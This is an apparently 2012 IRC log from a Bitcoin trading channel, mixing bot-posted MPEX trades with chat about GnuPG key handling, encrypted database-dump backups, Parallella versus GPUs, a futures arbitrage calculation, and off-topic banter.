hax! Oct 27 21:01:46 actually there was a nightmare situation with one customer who somehow changed his default key in between having it registered and sending the first payment Oct 27 21:01:49 and subsequent orders Oct 27 21:01:56 took a coupla days to figure out wtf. Oct 27 21:01:58 i needed the second key to be used in chroot anyway so i did not hax around it Oct 27 21:03:03 jurov: Any guess why the doc shows it? http://packages.python.org/python-gnupg/#using-signing-and-encryption-together Oct 27 21:04:18 i don't remember, it was months ago... but as you see, at least on decryption you don't have any parameter there Oct 27 21:04:21 i think that's a new version of a diff branch jurov Oct 27 21:04:23 to choose the key Oct 27 21:04:35 iirc the pympex uses prev python Oct 27 21:05:02 2.2 vs 2.4 or 3.2 vs 3.4 or w/e something like that Oct 27 21:05:43 the you can answer here if you want some karma: http://stackoverflow.com/questions/10681563/how-to-choose-encryption-decryption-key-in-python-gnupg Oct 27 21:06:10 actually... it might be time someone makes a pympex port for the latest python Oct 27 21:08:44 [MPEX] [S.DICE] 29630 @ 0.003375 = 100.0013 BTC [-] Oct 27 21:10:29 Hmm... I see a pirate Oct 27 21:10:58 Oh wait, no, it's just Gladamas disguised for Halloween. Oct 27 21:11:25 did pirate release the list of depositor names and emails yet ? Oct 27 21:11:31 heh Oct 27 21:11:33 no wait, that was the ppt i mean eh... Oct 27 21:11:59 BITCOIN WAS WRITTEN BY THE US SIT-COM CONSPIRACY Oct 27 21:14:52 The Universe was created by The Conspirator. It's just one huge conspiracy. Oct 27 21:15:09 Everything is conspiracy. Oct 27 21:15:49 http://phys.org/news/2012-10-real-physicists-method-universe-simulation.html Oct 27 21:16:13 your conspiratorial attempts to fool me into believing your conspiracies fail. Oct 27 21:19:46 Worry not, for it make no difference whatsoever because everything is nothing and nothing is everything and nothing. It's all in your head. Be sure to keep it in there! Here, take a tinfoil hat. Oct 27 21:20:19 is it certified ? Oct 27 21:20:51 Yes, by self-certifying conspirators. Oct 27 21:21:24 sounds legit. Oct 27 21:21:55 Everyone are self-certifying conspirators. All truths are different and contradictory, but all truths nevertheless. Oct 27 21:23:18 [14:15] http://phys.org/news/2012-10-real-physicists-method-universe-simulation.html Oct 27 21:24:19 "Of course, any conclusions resulting from such work would be limited by the possibility that everything we think we understand about quantum chromodynamics, or simulations for that matter, could be flawed." Oct 27 21:25:27 That... we basically can't prove if what we see is a simulation or not while testing and measuring from inside the simulation based on our knowledge of simulations. Oct 27 21:25:47 this is old as dirt. Oct 27 21:26:10 We wouldn't know how things work outside the simulation. Oct 27 21:30:24 And even if it's not a simulation... It's a universe with particles and a set of rules how they interact... It's basically the same as a simulation, but in more complex. Oct 27 21:31:17 Simulation or not, seems like the same thing... Oct 27 21:32:54 Welcome to agnosticism Oct 27 21:34:10 Godammit Oct 27 21:34:49 [MPEX] [S.MPOE] 15030 @ 0.00046529 = 6.9933 BTC [-] Oct 27 21:34:51 [MPEX] [S.MPOE] 20900 @ 0.00046499 = 9.7183 BTC [-] Oct 27 21:34:52 [MPEX] [S.MPOE] 9500 @ 0.00046477 = 4.4153 BTC [-] Oct 27 21:34:53 [MPEX] [S.MPOE] 8412 @ 0.00046475 = 3.9095 BTC [-] Oct 27 21:35:38 But I guess that would most closely define myself. Oct 27 21:42:09 hmm, Windows 8 looks like THE shit. ("shit" being used pejoratively) Oct 27 21:42:36 Thank you for spamming my Live inbox, Microsoft. Oct 27 21:45:04 Seriously... what good is an OS where I can't have a clusterfuck of icons on a desktop? Oct 27 21:49:07 ACHIEVEMENT UNLOCKED: NO ICONS Oct 27 21:49:27 ahahahah Oct 27 21:50:17 hmm, Windows 8 looks like THE shit. << that means great. Oct 27 21:50:25 you say "like shit" if you want it to be pejorative Oct 27 21:50:43 No, THE shit, litteral meaning Oct 27 21:51:40 I have to use THE, meaning it's THE one. Oct 27 21:52:08 i dun think english works that way Oct 27 21:52:10 seriously, I have icons turned off Oct 27 21:52:12 its fucking baus Oct 27 21:52:30 i don't even use the desktop Oct 27 21:52:31 Unfortunatly it conflicted with an idiom. Oct 27 21:52:33 since i dunno, the 90s Oct 27 21:52:56 How do you sort your files... Oct 27 21:52:58 well, that, and my desktop background is http://miotd.com/images/20120604.jpg Oct 27 21:53:02 so extra bausness Oct 27 21:53:07 mircea_popescu: well Oct 27 21:53:09 to be fair Oct 27 21:53:17 X exists to display multiple terms concurrently Oct 27 21:53:18 BTC-Mining by NAME Oct 27 21:53:28 and by date and by size and by their mother's pedigree Oct 27 21:53:58 desktops are for people who use like... smartphones and shit like that. Oct 27 21:54:25 Yeah, but I mean, how do you find specific files? Oct 27 21:54:33 find ? Oct 27 21:54:42 find. Oct 27 21:54:47 or else history Oct 27 21:54:53 mostly history really. Oct 27 21:54:54 its like a 40 year old command Oct 27 21:54:58 Assuming you can't remember the name for every thousand files you have... Oct 27 21:55:06 its older than most girls i fucked. Oct 27 21:55:14 i run a file i can't remember the name of ?! Oct 27 21:55:16 find -iname with globs. Oct 27 21:55:17 what am i! Oct 27 21:55:31 Find is only useful when you know the filename. Oct 27 21:55:42 why am i running it if i don't know its filename! Oct 27 21:56:56 I have that problem all the time. Web files, old game I want to play again, web images I want to get back editing on. Oct 27 21:57:37 i dont remember when i last saw the desktop Oct 27 21:57:44 and tbh i couldn't tell you what my image is Oct 27 21:58:20 Eh. Well I order things on my desktop for easy access. Oct 27 21:59:25 diff people, diff styles Oct 27 21:59:38 and some feet http://polimedia.us/dtng/c/src/135136436045.jpg Oct 27 22:00:08 [MPEX] [S.MPOE] 11610 @ 0.00046475 = 5.3957 BTC [-] Oct 27 22:00:09 [MPEX] [S.MPOE] 25738 @ 0.00046474 = 11.9615 BTC [-] Oct 27 22:00:38 Well the problem with the desktop is files moving around when the screen resolution changes or moving files displacing other icons. Oct 27 22:00:48 That and the desktop only have so many space... Oct 27 22:01:17 But there's fixes for that. Windows is quite customizable. Oct 27 22:12:00 Actually, let me get a screenshot of my desktop Oct 27 22:16:23 [MPEX] [S.DICE] 20000 @ 0.003375 = 67.5 BTC [-] Oct 27 22:19:09 Damn image sharers... Oct 27 22:20:06 BTC-Mining use dtng :D Oct 27 22:20:32 I ended up using imgur. It managed not to freeze near the end. Oct 27 22:20:36 http://i.imgur.com/xzx1y.jpg Oct 27 22:23:08 too much shit Oct 27 22:24:16 eh, but easy to access everything Oct 27 22:24:43 I never really have to look around for what I want Oct 27 22:28:00 I keep off the programs I don't use often but can at least remember the names for the start menu/search box. Oct 27 22:28:42 For the rest, I just like to have organized folders, searching for files is too tedious. Oct 27 22:33:51 sup Oct 27 22:35:11 Not much Oct 27 22:35:25 Waiting for Nefario to release assets data... Oct 27 22:37:51 hehe, love how mpex makes their dump public while people wait for nefario to wake up Oct 27 22:37:59 maybe he doesnt give a fuck anymore Oct 27 22:39:37 He wants all double payments back and then processing payments before proceeding with releasing information I get it. Oct 27 22:41:50 [MPEX] [S.MPOE] 33278 @ 0.00046479 = 15.4673 BTC [+] Oct 27 22:47:33 yep - called him last week and he said the same... Oct 27 22:57:33 i suspect he just wants the attention at this point. Oct 27 22:59:08 http://www.kickstarter.com/projects/adapteva/parallella-a-supercomputer-for-everyone Oct 27 22:59:14 darn im really tempted, 2 hrs to go Oct 27 23:03:02 5k backers and 70k over target in 2 houyrs ? Oct 27 23:04:11 hm Oct 27 23:04:14 120k over target Oct 27 23:04:37 twas 100k short just the other day Oct 27 23:06:47 why does it say 117 minutes ? Oct 27 23:06:51 is that like time left or something ? Oct 27 23:07:10 yes Oct 27 23:07:16 it clearly says MINUTES TO GO Oct 27 23:07:16 [MPEX] [S.MPOE] 6622 @ 0.00046479 = 3.0778 BTC [+] Oct 27 23:07:28 I dont really see a point in this though Oct 27 23:07:34 parallel computing is already accessable to the masses Oct 27 23:07:37 Diablo-D3 i cnat raed Oct 27 23:07:43 mircea_popescu: APPARENTLY NOT Oct 27 23:07:48 TOO MUCH MASTURBATION IS BAD FOR THE EYES Oct 27 23:07:50 zero tolerence Oct 27 23:08:03 resses is my roll modal Oct 27 23:17:40 Once completed, the 64-core version of the Parallella computer would deliver over 90 GFLOPS of performance and would have the the horse power comparable to a theoretical 45 GHz CPU Oct 27 23:18:09 1500$ for 2 x 64 cores board... Oct 27 23:18:15 Seems cheap... Oct 27 23:19:18 yeah uh Oct 27 23:19:21 I do that on my 7970. Oct 27 23:19:25 accually its 99$ Oct 27 23:19:36 burning like 2 watts Oct 27 23:19:49 they make GCNs that small Oct 27 23:19:52 That sounds cheaper Oct 27 23:20:00 well, maybe not that low of wattage Oct 27 23:20:09 but high performance memory burns watts Oct 27 23:20:21 jeez, who are you talking to Diablo-D3 Oct 27 23:20:22 They're going to be 100$? Oct 27 23:20:26 ye Oct 27 23:20:28 99$ Oct 27 23:20:46 i pasted a link so you can read this shit Oct 27 23:20:55 100$ for 90 GFLOPS? Sounds cheap. Oct 27 23:20:56 kakobrekla: you have btc-mining on ignore? Oct 27 23:21:01 no Oct 27 23:21:21 then Im talking to him Oct 27 23:21:22 what does memory has to do with anything here Oct 27 23:21:23 and you Oct 27 23:21:27 kakobrekla: oh, watts Oct 27 23:21:42 the $100 gcn is more powerful, but uses more watts Oct 27 23:21:49 I imagine parallella has shit for memory Oct 27 23:22:02 I don't really know cheap tho. Just stating compared to standalone consumer CPU/GPU specs and price. Oct 27 23:22:03 also, parallella sounds like a food Oct 27 23:22:12 BTC-Mining: cheap isnt magically good Oct 27 23:22:22 not when people can buy parallel hardware already Oct 27 23:22:26 and may even have it and not know it Oct 27 23:22:41 and dev boards tending to be incredibly more expensive compared to consumer grade hardware. Oct 27 23:23:17 parallel doesnt magically fix shit either Oct 27 23:23:29 did anyone claim that? Oct 27 23:23:34 okay so, they're claiming 26 gigaflops on $99 Oct 27 23:24:50 a 7750, the smallest GCN, using the ddr3 model, does 819 gflops and has 55 max watts and costs $109 Oct 27 23:25:54 the smallest still in production 5xxx/69xx is a Cedar, the 7350, 104 gflops, 20 watts Oct 27 23:25:58 no price avail because its OEM only Oct 27 23:26:01 Diablo-D3 you know these ipos tend to be a lot of hype. Oct 27 23:26:18 Im just saying here, cheap parallel hardware is already here Oct 27 23:26:21 But can you really do everything you can do on a dev board on those? Oct 27 23:26:35 yes. Oct 27 23:26:41 I wrote a bitcoin miner, after all. Oct 27 23:27:33 Yes... but not all good GPU are good at that. Basically only Radeon. Oct 27 23:27:50 Because they're designed to do specific calculatations... Oct 27 23:29:06 Would they be as performant for any task? Doesn't seem so. Aren't dev boards more like generic CPU for performing a larger variety of tasks? Oct 27 23:32:45 [MPEX] [S.MPOE] 16237 @ 0.00046474 = 7.546 BTC [-] Oct 27 23:32:47 [MPEX] [S.MPOE] 33763 @ 0.00046446 = 15.6816 BTC [-] Oct 27 23:32:50 BTC-Mining i don't imagine parallella chips do so well at parallelizing "a variety" of tasks anyway Oct 27 23:34:47 Well it would do a variety of tasks... Oct 27 23:35:29 So a more generic processor would be preferable. Unless you want to do tasks a GPU is good for. Oct 27 23:35:46 Then consumer grade GPU are pretty performant and cheap. Oct 27 23:35:51 im sure it's better than a radeon vidcard in that sense Oct 27 23:36:07 but reasonably if i wanted to do parallel processing i'd still just rent out a rack of boxes and use that. Oct 27 23:36:34 Well yeah. Renting is cheaper and you don't need to buy the whole hardware. Oct 27 23:37:31 But if you need to share it and use it all the time, a cheap one wouldn't be bad. Oct 27 23:39:45 Wouldn't for example students benefit from having cheap dev board available? Oct 27 23:42:00 OMG, mircea_popescu that statjson will make things so much easier, and the md5, but what exactly is the md5 of for each secton? Oct 27 23:42:29 the previous part of the section Oct 27 23:42:41 with ',' included? Oct 27 23:42:51 yes and mind the /n's Oct 27 23:42:58 jurov ran into the same thing yest Oct 27 23:43:14 oh, fing windows, i can't test it with /n's in mind Oct 27 23:43:24 BTC-Mining maybe. who knows what students need... Oct 27 23:43:28 i'll have to get back to my main macine Oct 27 23:44:04 basically the point of the md5 is precisely to allow *some* armor hardening of the thing while still allowing it to be read like plain text Oct 27 23:44:12 a sort of cabbage-eggplant. Oct 27 23:44:54 Well it's purely guesses and speculation on my part anyway. I don't really know anything about development and the need for dev boards. Oct 27 23:45:12 well, seems like it can be utilized as a very quick and simple check for differences Oct 27 23:45:24 smickles and also, seen the mpex db dump ? good insurance for customers, if they put a big order in also save a db dump :p Oct 27 23:45:48 smickles and yes, that too, allows you to see fast which sections changed if you store prev hashes Oct 27 23:46:10 it doesn't look like so much but a lot of work went into this thing actually. Oct 27 23:57:56 [MPEX] [S.MPOE] 9478 @ 0.00046478 = 4.4052 BTC [+] Oct 27 23:57:57 [MPEX] [S.MPOE] 22600 @ 0.0004655 = 10.5203 BTC [+] Oct 28 00:24:01 [MPEX] [S.MPOE] 46300 @ 0.00046648 = 21.598 BTC [+] Oct 28 00:49:40 [MPEX] [S.MPOE] 34100 @ 0.00046701 = 15.925 BTC [+] Oct 28 01:06:04 [MPEX] [S.BVPS] 3000 @ 0.0032491 = 9.7473 BTC [-] Oct 28 01:14:42 mircea_popescu: you should sign and encrypt the db with the exchange key. that way, should it become necessary for the public to decrypt it, you wouldn't need to release your personal key Oct 28 01:15:10 i'm not releasing my key either way, why'd i release it ? Oct 28 01:15:16 i'll just decrypt the db Oct 28 01:16:35 idunno, i have some half-baked reason forming which invoves some situation where you are abducted or something Oct 28 01:17:07 you misconstrue the point here. Oct 28 01:17:39 suppose for a moment there's an uberconspiracy of like, the reptillians Oct 28 01:17:55 who covertly follow all my communications, know of all my back-ups and one day suddenly strike! Oct 28 01:18:01 and destroy ALL servers. Oct 28 01:18:03 what nao ? Oct 28 01:18:22 the advantage of this scheme is that backups can now be obtained from both known *and unknown* sources Oct 28 01:18:29 making the entire thing much more resilient to attacks. Oct 28 01:18:41 go suck it reptillians! Oct 28 01:18:44 Oh, i feel like i completly understand the backup aspect of it Oct 28 01:19:06 lol kakobrekla Oct 28 01:19:33 i was trying to think of a situation where you are inaccessable some how, and you have the exchange key released to the public so that people can get at the data Oct 28 01:19:46 in any event the exchange key can never be released Oct 28 01:19:56 think about it, the exchange key is released to decrypt db Oct 28 01:19:57 prolly for the best Oct 28 01:20:05 a week later there's fifty billion fake stats floating around Oct 28 01:20:33 what would the use of a stat be if the exchange were down tho? Oct 28 01:20:41 how do i know ? Oct 28 01:20:54 hey, i said the idea was half-baked :P Oct 28 01:20:59 :p Oct 28 01:22:58 anyway, the system is pretty well designed for expansion. in the future i might generate a special key just for db signing, and put it somewhere safe Oct 28 01:29:27 well... public key... private key... how about other backup keys where the private key is never disclosed and the public key to decrypt the database is only disclosed in case you disappear? Oct 28 01:30:33 And sign the public key for the database with the exchange's key. That way people know if they decrypt it with that public database key, it was a statement encrypted with the official backup private key. Oct 28 01:30:39 public key is needed to decrypt Oct 28 01:30:52 i mean. private key is needed to decrypt Oct 28 01:31:23 [MPEX] [S.MPOE] 2400 @ 0.00046648 = 1.1196 BTC [-] Oct 28 01:31:24 [MPEX] [S.MPOE] 7022 @ 0.00046621 = 3.2737 BTC [-] Oct 28 01:31:26 [MPEX] [S.MPOE] 2078 @ 0.00046583 = 0.968 BTC [-] Oct 28 01:31:42 hmm... why? Oct 28 01:32:22 ... Oct 28 01:32:44 who encrypts with private key ?! Oct 28 01:32:49 wasn't there an xkcd about this ? Oct 28 01:32:58 Maybe Oct 28 01:34:59 What would the issue with that be? Oct 28 01:35:08 lemme find it Oct 28 01:35:39 http://imgs.xkcd.com/comics/responsible_behavior.png lol Oct 28 01:35:53 that's not it tho Oct 28 01:36:05 idea was guy encrypts a "would you marry me" with his public key Oct 28 01:36:07 gives to girl Oct 28 01:36:12 she keeps trying ot hack it Oct 28 01:36:20 he figures by the time she breaks it he'll know for sure. Oct 28 01:38:10 But what's the issue with encrypting with your private key with a public key for decrypting the data? Oct 28 01:38:28 kinda backwards. Oct 28 01:39:27 But the idea is to be able to release confidential data. And only if you disappear, an automated process triggers because a time limit is not reset and it releases the public key for decrypting the database. Oct 28 01:40:37 yea, but ideally this would not be public knowledge. Oct 28 01:41:55 yeah, I mean, just for covering the case of all people with access to MPEx suddenly being incapacitated to keep-through with the business, data could still be released. Oct 28 01:43:05 still, you know, a raw db dump isn't the right way to do this. Oct 28 01:43:21 it'd have to be released as a per-issuer section, encrypted with the issuer's public key. Oct 28 01:43:29 did i kick a hornet's nest or somehting? Oct 28 01:43:35 no ? Oct 28 01:43:44 ok :) Oct 28 01:43:44 Well what's the problem with that? Oct 28 01:44:07 just, the natural inclination of people is to think in terms of, this db dump is for if i die. not what it is for. it's for if govt confiscates interwebs. Oct 28 01:44:21 BTC-Mining nothing's the problem wit hthat, but it's not part of the db dump line :) Oct 28 01:46:00 A special database, with it's own key pair. You make it available for download, encrypted with the database private key. The public key for it is released after 6 months without resetting the counter on it. Signed with the exchange's key so we know any data decryptable with that public key is from the official source. Oct 28 01:46:10 it's not about you being dead, it's about you being abducted by the reptillians Oct 28 01:47:10 The decrypted data containing a per issuer data with further encryption with their public key. Oct 28 01:47:17 http://media.giantbomb.com/uploads/0/3698/375957-reptar003_large.gif Oct 28 01:47:25 So only issuer has access to data for each holder. Oct 28 01:48:19 so you're stuck waiting for six months Oct 28 01:48:26 and you depend on the entire system surviving by itself for six months Oct 28 01:48:35 Basically Oct 28 01:48:51 honestly, i think if nefario came out right now and said he's releasing issuer data in april Oct 28 01:48:58 and actually DOES release it in april Oct 28 01:49:08 it'd be about as useful as a bunion. Oct 28 01:49:38 Well for many, it would actually still be useful... Oct 28 01:50:22 i'm not saying there's no way to do this Oct 28 01:50:36 As long as issuers keep the accounting and putting the BTC aside for when that data is released. Oct 28 01:50:52 Honestly, I don't expect anything that extreme, mircea. Oct 28 01:51:40 Just stating it would be possible to make a database public and official without the need to release a private key to forge different sets of data. Oct 28 01:51:54 but in the extreme case the db needs to be distributed what i envisage is a text flatfile containing each issuer's holders encrypted with his public key, the whole thing signed and dumped on like, piratebay Oct 28 01:52:21 Would probably be simplier and better. Oct 28 01:52:37 alongside a final dump of everyone's stats, encrupted with their public key Oct 28 01:52:54 But that flatfile needs to be encrypted with the exchange's key first of course. Oct 28 01:53:01 actually this is delineated in the faq since the days when people were asking mpex (but not glbse) what is the plan for the case which befel glbse but not mpex. Oct 28 01:53:14 not really, no. Oct 28 01:53:43 hmm... how do we know the flatfile is official then? Oct 28 01:54:03 the whole thing signed Oct 28 01:54:29 ah well sorry, that's what I meant. Oct 28 01:54:33 ya Oct 28 01:54:44 Either way the source can be verified. Oct 28 01:56:47 i'ma go watch porn with the girls. ttyall laters. Oct 28 01:57:03 [MPEX] [S.MPOE] 5022 @ 0.00046583 = 2.3394 BTC [-] Oct 28 01:57:04 [MPEX] [S.MPOE] 6437 @ 0.00046446 = 2.9897 BTC [-] Oct 28 01:57:06 [MPEX] [S.MPOE] 9382 @ 0.00046419 = 4.355 BTC [-] Oct 28 01:57:07 [MPEX] [S.MPOE] 31166 @ 0.00046249 = 14.414 BTC [-] Oct 28 02:22:27 [MPEX] [S.MPOE] 16154 @ 0.00046249 = 7.4711 BTC [-] **** BEGIN LOGGING AT Sun Oct 28 08:13:55 2012 Oct 28 08:15:01 lol, i am imortalized http://trilema.com/2012/that-sticky-issue-of-enforcing-contracts/ Oct 28 08:15:09 hehe yeah Oct 28 08:15:48 what the hell is with people painting their walls orange ? Oct 28 08:16:02 and i do not mean some pale yellow or w/e, i mean orange, like the fruit. Oct 28 08:18:55 well, it seems one reason may be to annoy you Oct 28 08:19:21 lol Oct 28 08:19:57 is it a darker sort of orange, or bright glowing orange? Oct 28 08:20:13 http://polimedia.us/dtng/c/src/135140516264.jpg punishment ensues Oct 28 08:20:15 like 70s era or gay pride parade? Oct 28 08:20:34 it's a bright glowing orange that makes food look unhealthy and women's complexion totally alien Oct 28 08:34:32 ;;ticker Oct 28 08:34:32 BTCUSD ticker | Best bid: 10.40000, Best ask: 10.44857, Bid-ask spread: 0.04857, Last trade: 10.40000, 24 hour volume: 43262.33694086, 24 hour low: 10.12999, 24 hour high: 10.83883, 24 hour vwap: 10.45494 Oct 28 08:34:45 lol so for 3 months now we've been giggling between 10 and 14 Oct 28 08:40:07 [MPEX] [S.MPOE] 41623 @ 0.00046298 = 19.2706 BTC [+] Oct 28 08:42:27 ;;calc .2876 - .235 Oct 28 08:42:28 0.0526 Oct 28 08:42:38 ;;calc [bc,24hprc] - 10 Oct 28 08:42:39 0.44 Oct 28 08:48:12 ;;calc -1 * [bc,24hprc] + 10 + .2867 Oct 28 08:48:13 -0.1533 Oct 28 08:48:51 ;;calc -1 * [bc,24hprc] + 10 + .1367 Oct 28 08:49:21 -0.3033 Oct 28 08:49:58 o deer Oct 28 08:49:59 ;;calc -1 * [bc,24hprc] + 10 + .4367 Oct 28 08:50:00 -0.0033 Oct 28 08:50:43 ;;calc -1 * [bc,24hprc] + 10 -.235 Oct 28 08:50:44 Error: Something in there wasn't a valid number. Oct 28 08:50:48 ;;calc -1 * [bc,24hprc] + 10 - .235 Oct 28 08:50:49 -0.675 Oct 28 08:51:59 ;;calc [bc,24hprc] - 10 - .2876 Oct 28 08:52:00 0.1524 Oct 28 08:53:03 lol what sorcery is this Oct 28 08:55:05 i'm trying to work out that arb b/t mpex and icbit Oct 28 08:55:18 you know anything about call put parity? Oct 28 08:56:36 the futures on icbit deliver at 10 at the end of december, so at some point in time, there should be an arb op Oct 28 08:56:50 oh, well, middle of december, but still Oct 28 08:57:42 ;;calc [ticker --bid] - 10 - .2876 Oct 28 08:57:43 0.06426 Oct 28 08:59:12 oh, i know what i'm fucking up Oct 28 08:59:29 ;;calc [ticker --bid] - 10 / [ticker --bid] - .2876 Oct 28 08:59:30 9.09825002691 Oct 28 09:00:07 ;;calc [ticker --bid] - 10 - .2876 * [ticker --bid] Oct 28 09:00:08 -2.625334936 Oct 28 09:00:29 ;;calc ([ticker --bid] - 10 - .2876 * [ticker --bid]) / [ticker --bid] Oct 28 09:00:29 -0.253609973087 Oct 28 09:00:39 ;;calc ([ticker --bid] - 10 - .2876 * [ticker --bid]) / [ticker --bid] * -1 Oct 28 09:00:40 0.253609973087 Oct 28 09:01:16 :o Oct 28 09:03:30 ;;calc .2536 * .98 Oct 28 09:03:30 0.248528 Oct 28 09:04:34 ;;calc ([ticker --bid] - 10 + .1549 * [ticker --bid]) / [ticker --bid] * -1 Oct 28 09:04:35 -0.188890026913 Oct 28 09:04:42 ;;calc ([ticker --bid] - 10 + .1549 * [ticker --bid]) / [ticker --bid] Oct 28 09:04:42 0.188890026913 Oct 28 09:05:12 [MPEX] [S.MPOE] 23268 @ 0.00046139 = 10.7356 BTC [-] Oct 28 09:05:14 [MPEX] [S.MPOE] 300 @ 0.00046047 = 0.1381 BTC [-] Oct 28 09:05:16 [MPEX] [S.MPOE] 1869 @ 0.00046008 = 0.8599 BTC [-] Oct 28 09:05:19 [MPEX] [S.MPOE] 11063 @ 0.00045993 = 5.0882 BTC [-] Oct 28 09:05:33 mircea_popescu: come play monopoly with me and bitfoo for btc Oct 28 09:06:05 ;;calc ([ticker --bid] - 10 + .1549 * [ticker --bid]) Oct 28 09:06:06 1.955363114 Oct 28 09:06:51 that's a lot of calculations :o Oct 28 09:07:09 i should stop spamming, i gueess Oct 28 09:07:18 nah, it's cool Oct 28 09:07:22 work it out and then we can all arb ;) Oct 28 09:07:43 that last one proves that it's there, if you know what you're looking at Oct 28 09:08:09 it's too late in the day for me to even try and figure that out Oct 28 09:09:28 ;;calc .2762 * [ticker --bid] - .2417 * [ticker --bid] Oct 28 09:09:29 0.35724681 Oct 28 09:10:38 short stradle at 100N, buy icbit futures up to 10.35 Oct 28 09:11:47 ;;calc 200 / [ticker --bid] Oct 28 09:11:47 19.3143782026 Oct 28 09:12:39 crap, what quantities??!! Oct 28 09:14:32 icbit depth looks pretty thin Oct 28 09:15:24 oh lol my ass off, Oct 28 09:15:33 i've done it already on accident Oct 28 09:18:43 bitfoo: part of that is the fact that only the nearest 5 orders are shown (either side of center) Oct 28 09:19:01 yeah, I was trying to figure out how to see more than that Oct 28 09:19:05 not possible I assume? Oct 28 09:19:10 "comming soon" Oct 28 09:19:12 heh Oct 28 09:19:18 ™ Oct 28 09:21:40 i should find confidence in my math, then i would arb that op so hard Oct 28 09:30:33 what about call/put parity smickles ? Oct 28 09:30:47 mircea_popescu: i identified the arb op Oct 28 09:30:49 currently Oct 28 09:31:08 short stradle at 100N, and buy the futures up to 10.35ish Oct 28 09:31:13 [MPEX] [S.MPOE] 13537 @ 0.00045993 = 6.2261 BTC [-] Oct 28 09:31:17 [MPEX] [S.MPOE] 7600 @ 0.00045989 = 3.4952 BTC [-] Oct 28 09:31:17 [MPEX] [S.MPOE] 13005 @ 0.00045918 = 5.9716 BTC [-] Oct 28 09:31:18 [MPEX] [S.MPOE] 11033 @ 0.00045901 = 5.0643 BTC [-] Oct 28 09:31:29 aite Oct 28 09:32:20 part of that is the fact that only the nearest 5 orders are shown << who comes up wit this sort of shit ? Oct 28 09:32:29 i mean, why 5 ? why not 9 ? why not 3.14 ? Oct 28 09:34:33 well im sure you know why 3.14 was not sued Oct 28 09:34:34 used Oct 28 09:34:40 [MPEX] [O.BTCUSD.C100N] 10 @ 0.27614221 = 2.7614 BTC [+] Oct 28 09:35:19 [MPEX] [O.BTCUSD.P100N] 9 @ 0.24169245 = 2.1752 BTC [-] Oct 28 09:35:20 see, that's faulty. "we should do X, but we can't practically do X so we are doing Y instead" Oct 28 09:35:23 no. fuck you. do X. Oct 28 09:35:35 if it should be 3.14 then they either do 3.14 or not do it at all. Oct 28 09:35:37 scrollbars are tough Oct 28 09:36:25 anyway this is all academic, iirc there wasn't much volume anyway, like 1-2 btc a week or something Oct 28 09:37:01 or not wait, i think i was looking at some gold and oil futures Oct 28 09:37:03 this is btc ? Oct 28 09:38:22 meh gotta log in to see mkt what bs. Oct 28 09:38:27 [MPEX] [O.BTCUSD.P100N] 2 @ 0.24169245 = 0.4834 BTC [-] Oct 28 09:39:56 Να γίνεστε δική σας τράπεζα Oct 28 09:40:01 anyone recognise anything in there ? Oct 28 09:41:25 recognise what where? Oct 28 09:41:42 words in the sentence Oct 28 09:42:06 it's all ?? on my terminal Oct 28 09:42:18 aww. it's greek Oct 28 09:42:24 and it ends in trapeza, which in greek means bank Oct 28 09:42:42 it's a trap? Oct 28 09:43:17 nana nah, a trapeze Oct 28 09:45:19 hmm, high wire act, vs starwars reference Oct 28 09:45:44 :D Oct 28 09:46:06 greek is a very humorous language. Oct 28 09:46:35 "main page" is something like kuria teliga Oct 28 09:46:46 kuria you might have heard of Oct 28 09:46:49 as in, the roman curia Oct 28 09:47:09 Κύρια πύλη Oct 28 09:47:20 yielded court in english Oct 28 09:48:45 "For the last time, geeks should not open financial service businesses just because they can make the website and fire up some hardware" Oct 28 09:48:46 so it's like tele-court, main page == judge judy? Oct 28 09:48:47 guruvan totally has it. Oct 28 09:49:21 pule is more like gate than page. Oct 28 09:50:40 i should've continued learning greek Oct 28 09:51:32 i took 2 or three classes then stopped because it was a 7am class, and I had an hour bikeride to make it Oct 28 09:51:39 i never took any classes Oct 28 09:51:53 find a greek girl, date her. Oct 28 09:52:04 that should work well for me Oct 28 09:54:23 go home tonight and say "honey, today we talk about χαρέμι" Oct 28 09:55:26 "Prospero, the only British satellite to date launched on a British rocket, lifted off from Launch Area 5B..." < area 5b sounds like a shitty appartment with only one room Oct 28 09:56:28 lol Oct 28 09:56:31 prospero is that fake enthusiam you get from an pessimeist Oct 28 09:56:35 satellite sitcom Oct 28 09:57:01 nothing could be lamer than romania's first and only satellite to date tho Oct 28 09:57:06 in the shape of a 10cm cube Oct 28 09:57:08 and they've only done it once since 1971 Oct 28 09:57:23 http://www.ziuaveche.ro/wp-content/uploads/2012/02/Goliat-2.jpg Oct 28 09:57:27 thing is called goliat ffs. Oct 28 09:58:13 lol, did they throw it by and and lose track of it (now thinking it was a successful mission)? Oct 28 09:58:19 *by hand Oct 28 09:58:46 what is that supposed to do? Oct 28 09:58:57 takes pictures, reports back at 114kbps Oct 28 09:59:07 http://st.interakt.md/content/news/big/goliat---primul-satelit-romanesc-in-spatiu.jpg Oct 28 09:59:28 When the project began, the developers of this satellite were still in college."" Oct 28 09:59:33 it's a school project! Oct 28 10:00:00 :D Oct 28 10:00:07 you see this is what a laissez faire state is Oct 28 10:00:15 it's only fucken satellite is launched by students Oct 28 10:00:21 ON THEIR OWN DIME Oct 28 10:01:46 "As of 26 February 2012, it appears that the satellite has not settled into the orbit properly. Due to a malfunction to its stabilizing system, it is expected that the satellite will spin uncontrollably and eventually get lost in space. However, the coordinator of the project, Mugurel Bălan has stated that the situation is under control." Oct 28 10:02:13 >D Oct 28 10:02:35 statement was made 13 days after launch Oct 28 10:02:50 well i blame the french Oct 28 10:03:14 makes sense, they launched it, right? Oct 28 10:04:07 ya Oct 28 10:04:24 shoulda hired the brits instead, 5b sounds more hygienic than guyana Oct 28 10:04:33 lol, so in the same timeframe it took to develop this (and the rocket that sent it up), elon musk docked a ship with the ISS Oct 28 10:04:41 [MPEX] [S.MPOE] 4300 @ 0.00046291 = 1.9905 BTC [+] Oct 28 10:04:43 [MPEX] [S.MPOE] 7577 @ 0.00046298 = 3.508 BTC [+] Oct 28 10:04:44 [MPEX] [S.MPOE] 623 @ 0.00046335 = 0.2887 BTC [+] Oct 28 10:05:07 well elon was not in college atthe time Oct 28 10:05:15 good point Oct 28 10:05:31 but neither were the people wo developed the vega rocket Oct 28 10:05:52 that's old iirc Oct 28 10:06:32 http://en.wikipedia.org/wiki/Vega_(rocket) Oct 28 10:06:37 not the one i'm talking about Oct 28 10:06:53 it's first launch sent up your satilite Oct 28 10:07:02 o wow Oct 28 10:07:39 "statists gonna state." Oct 28 10:07:44 lmao. Oct 28 10:09:37 oh wow, i'm going to make a solid rocket booster out of sucrose Oct 28 10:11:15 ummm Oct 28 10:11:21 does the community know roger ver is an ex-con ?! Oct 28 